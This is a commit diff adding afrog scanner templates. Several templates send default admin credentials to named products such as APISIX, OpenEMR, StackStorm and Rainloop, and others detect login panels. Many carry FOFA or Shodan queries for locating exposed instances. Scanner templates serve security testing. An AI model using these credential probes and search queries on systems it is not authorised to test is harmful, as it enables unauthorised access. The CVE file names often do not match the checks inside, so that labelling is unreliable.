add many pocs

Author: zan8in

pkg/config/banner.go

@@ -7,7 +7,7 @@ import (
 	"github.com/zan8in/gologger"
 )
 
-const Version = "2.5.3"
+const Version = "2.5.5"
 
 func ShowBanner(u *upgrade.Upgrade) {
 	gologger.Print().Msgf("\n|\tA F R O G\t>\t%s\t-\t%s\n\n", EngineV(u), PocV(u))

pocs/temp/afrog-pocs/cve/CVE-2017-17731.yaml pocs/afrog-pocs/CVE/2017/CVE-2017-17731.yaml

@@ -0,0 +1,27 @@
+id: 3com-nj2000-default-login
+
+info:
+  name: 3COM NJ2000 - Default Login
+  author: daffainfo
+  severity: high
+  verified: true
+  description: |
+    3COM NJ2000 contains a default login vulnerability. Default admin login password of 'password' was found. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+    SHODAN: http.title:"ManageEngine Password"
+    FOFA: body="NJ2000"
+  reference:
+    - https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
+  tags: default-login,3com,nj2000
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /login.html
+      body: password=password
+    expression: |
+      response.status == 200 && 
+      response.body.ibcontains(b'<title>3Com Corporation Web Interface</title>') &&
+      response.body.bcontains(b'<frame name="mainFrame" src="blank.html">')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2020-17526.yaml pocs/afrog-pocs/CVE/2020/CVE-2020-17526.yaml

@@ -6,22 +6,25 @@ info:
     severity: high
     verified: true
     description: |
-       Apache APISIX Dashboard default admin credentials were discovered.
-       fofa: icon_hash="358172742" || title="Apache APISIX Dashboard"
+        Apache APISIX Dashboard default admin credentials were discovered.
+        FOFA: icon_hash="358172742" || title="Apache APISIX Dashboard"
+        SHODAN: title:"Apache APISIX Dashboard"
+        FOFA: title="Apache APISIX Dashboard"
+    tags: apisix,apache,default-login
+    created: 2023/06/17
 
 rules:
-    r3:
-        request:
-            method: GET
-            path: /user/login?redirect=/
-        expression: response.body.ibcontains(b'<title>Apache APISIX Dashboard</title>')
-        stop_if_mismatch: true
     r0:
         request:
             method: POST
             path: /apisix/admin/user/login
-            Content-Type: application/json;charset=UTF-8
+            headers:
+                Authorization:
+                Content-Type: application/json;charset=UTF-8
             body: '{"username":"admin","password":"admin"}'
-        expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0')&& response.body.bcontains(b'"message":""')
-        stop_if_match: true
-expression: r3() && r0()
+        expression: |
+            response.status == 200 &&
+            response.body.bcontains(b'"code":0') && 
+            response.body.bcontains(b'"data"') &&
+            response.body.bcontains(b'"token"')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2020-22209.yaml pocs/afrog-pocs/CVE/2020/CVE-2020-22209.yaml

@@ -0,0 +1,25 @@
+id: hp-switch-default-login
+
+info:
+  name: HP 1820-8G Switch J9979A Default Login
+  author: pussycat0x
+  severity: high
+  description: |
+    HP 1820-8G Switch J9979A default admin login credentials were discovered.
+    FOFA: HP 1820-8G Switch J9979A
+  reference:
+    - https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
+  tags: default-login,hp
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /htdocs/login/login.lua
+      body:  username=admin&password=
+    expression: |
+      response.status == 200 &&
+      response.body.bcontains(b'"redirect": "/htdocs/pages/main/main.lsp"') &&
+      response.body.bcontains(b'"error": ""')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2020-22210.yaml pocs/afrog-pocs/CVE/2020/CVE-2020-22210.yaml

@@ -0,0 +1,27 @@
+id: inspur-clusterengine-default-login
+
+info:
+  name: Inspur Clusterengine 4 - Default Admin Login
+  author: ritikchaddha
+  severity: high
+  verified: true
+  description: |
+    Inspur Clusterengine version 4 default admin login credentials were successful.
+    FOFA: title="TSCEV4.0"
+  reference:
+    - https://blog.csdn.net/qq_36197704/article/details/115665793
+  tags: default-login,inspur,clusterengine
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /login
+      body: op=login&username=admin|pwd&password=123456
+      follow_redirects: true
+    expression: |
+      response.status == 200 &&
+      response.body.bcontains(b'"exitcode":0') &&
+      response.raw_header.bcontains(b'username=admin|pwd')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2020-22211.yaml pocs/afrog-pocs/CVE/2020/CVE-2020-22211.yaml

@@ -5,13 +5,19 @@ info:
   author: pikpikcu
   severity: high
   verified: true
-  description: fofa "NS-ICG"
+  description: |
+    Netentsec NS-ICG contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+    FOFA: "NS-ICG"
+  reference:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
+  tags: nsicg,default-login
+  created: 2023/06/17
 
 rules:
   r0:
     request:
       method: POST
-      path: /user/login/checkPermit
-      body: usrname=ns25000&pass=ns25000
-    expression: response.status == 200 && response.body.bcontains(b'{"agreed":true}')
+      path: /user/login/login
+      body: usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
+    expression: response.status == 302 && response.raw_header.bcontains(b'/user/main/')
 expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2021-35587.yaml pocs/afrog-pocs/CVE/2021/CVE-2021-35587.yaml

@@ -0,0 +1,27 @@
+id: openemr-default-login
+
+info:
+  name: OpenEMR - Default Admin Discovery
+  author: Geekby
+  severity: high
+  verified: true
+  description: |
+    OpenEMR default admin credentials were discovered.
+    FOFA: app="OpenEMR"
+    SHODAN: http.html:"OpenEMR"
+  reference:
+    - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image
+  tags: openemr,default-login
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /interface/main/main_screen.php?auth=login&site=default
+      body: new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10
+    expression: |
+      response.status == 302 &&
+      response.raw_header.bcontains(b'main.php?token_main=') &&
+      response.raw_header.bcontains(b'OpenEMR')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2021-37304.yaml pocs/afrog-pocs/CVE/2021/CVE-2021-37304.yaml

@@ -0,0 +1,30 @@
+id: powerjob-default-login
+
+info:
+  name: PowerJob - Default Login
+  author: j4vaovo
+  severity: high
+  verified: true
+  description: |
+    PowerJob default login credentials were discovered.
+    SHODAN: http.title:"PowerJob"
+    FOFA: title="PowerJob"
+  reference:
+    - https://www.yuque.com/powerjob/guidence/trial
+  tags: powerjob,default-login
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /appInfo/assert
+      headers:
+        Content-Type: application/json
+      body: |
+         {"appName":"powerjob-worker-samples","password":"powerjob123"}
+    expression: |
+      response.status == 200 && 
+      response.body.bcontains(b'{"success":true,"data":') &&
+      response.headers["content-type"].contains('application/json')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2021-37305.yaml pocs/afrog-pocs/CVE/2021/CVE-2021-37305.yaml

@@ -0,0 +1,35 @@
+id: rainloop-default-login
+
+info:
+  name: Rainloop WebMail - Default Admin Login
+  author: For3stCo1d
+  severity: high
+  verified: true
+  description: |
+    Rainloop WebMail default admin login credentials were successful.
+    FOFA: app="RAINLOOP-WebMail"
+  reference:
+    - https://github.com/RainLoop/rainloop-webmail/issues/28
+  tags: default-login,rainloop,webmail,foss
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /?/AdminAppData@no-mobile-0/0/15503332983847185/
+    expression: response.raw.bcontains(b'token":"')
+    output:
+      search: '"\"token\":\"(?P<token>.*?)\"".bsubmatch(response.body)'
+      token: search["token"]
+  r1:
+    request:
+      method: POST
+      path: /?/Ajax/&q[]=/0/
+      body: |
+        Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}
+    expression: |
+      response.status == 200 &&
+      response.body.bcontains(b'"Action":"AdminLogin"') &&
+      response.body.bcontains(b'"Result":true')
+expression: r0() && r1()

pocs/temp/afrog-pocs/cve/CVE-2021-40859.yaml pocs/afrog-pocs/CVE/2021/CVE-2021-40859.yaml

@@ -0,0 +1,32 @@
+id: stackstorm-default-login
+
+info:
+  name: StackStorm Default Login
+  author: PaperPen
+  severity: high
+  verified: true
+  description: |
+    A StackStorm default admin login was discovered.
+    FOFA: app="stackstorm"
+  reference:
+    - https://github.com/StackStorm/st2-docker
+  tags: stackstorm,default-login
+  created: 2023/06/17
+
+set:
+  basic: base64("st2admin:Ch@ngeMe")
+rules:
+  r0:
+    request:
+      method: POST
+      path: /auth/tokens
+      headers:
+        Content-Type: application/json
+        Authorization: Basic {{basic}}
+    expression: |
+      response.status == 201 &&
+      response.body.bcontains(b'"user":') &&
+      response.body.bcontains(b'"token":') &&
+      response.body.bcontains(b'"expiry":')
+expression: r0()
+      

pocs/temp/afrog-pocs/cve/CVE-2022-25125.yaml pocs/afrog-pocs/CVE/2022/CVE-2022-25125.yaml

@@ -0,0 +1,22 @@
+id: acemanager-login
+
+info:
+  name: ACEmanager Detection
+  author: pussycat0x
+  severity: info
+  verified: true
+  description: |
+    ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems.
+    FOFA: app="ACEmanager"
+  tags: panel,login,tech,acemanager
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /
+    expression: |
+      response.status == 200 && 
+      response.body.ibcontains(b'<title>::: ACEmanager :::</title>')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2022-37042.yaml pocs/afrog-pocs/CVE/2022/CVE-2022-37042.yaml

@@ -0,0 +1,27 @@
+id: acrolinx-dashboard
+
+info:
+  name: Acrolinx Dashboard
+  author: ffffffff0x
+  severity: info
+  verified: true
+  description: |
+    An Acrolinx Analytics dashboard was detected.
+    FOFA: title=="Acrolinx Dashboard"
+    SHODAN: http.title:"Acrolinx Dashboard"
+    GOOGLE: inurl:"Acrolinx Dashboard"
+  reference:
+    - https://docs.acrolinx.com/coreplatform/latest/en/analytics/acrolinx-analytics-dashboards
+  tags: acrolinx,panel
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /dashboard.html
+    expression: |
+      response.status == 200 &&
+      (response.body.ibcontains(b'<title>Acrolinx Dashboard</title>') ||
+      response.body.ibcontains(b'Acrolinx</title>'))
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2022-47945.yaml pocs/afrog-pocs/CVE/2022/CVE-2022-47945.yaml

@@ -0,0 +1,23 @@
+id: adminset-panel
+
+info:
+  name: Adminset Login Panel
+  author: ffffffff0x
+  severity: info
+  verified: true
+  description: |
+    An Adminset login panel was detected.
+    FOFA: app="AdminSet"
+  reference:
+    - https://github.com/guhongze/adminset/
+  tags: adminset,panel
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /
+      follow_redirects: true
+    expression: response.status == 200 && response.body.ibcontains(b'<title>AdminSet Login</title>')
+expression: r0()

pocs/temp/afrog-pocs/cve/CVE-2023-1671.yaml pocs/afrog-pocs/CVE/2023/CVE-2023-1671.yaml

@@ -0,0 +1,20 @@
+id: casemanager-panel
+
+info:
+  name: CaseManager Login Panel - Detect
+  author: ffffffff0x
+  severity: info
+  verified: true
+  description: |
+    CaseManager login panel was detected.
+    FOFA: title="CaseManager"
+  tags: casemanager,panel
+  created: 2023/06/17
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /login
+    expression: response.status == 200 && response.body.ibcontains(b'<title>CaseManager</title>')
+expression: r0()